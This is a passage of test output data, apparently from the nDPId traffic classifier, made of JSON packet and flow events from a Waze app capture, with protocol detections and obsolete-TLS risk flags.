+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 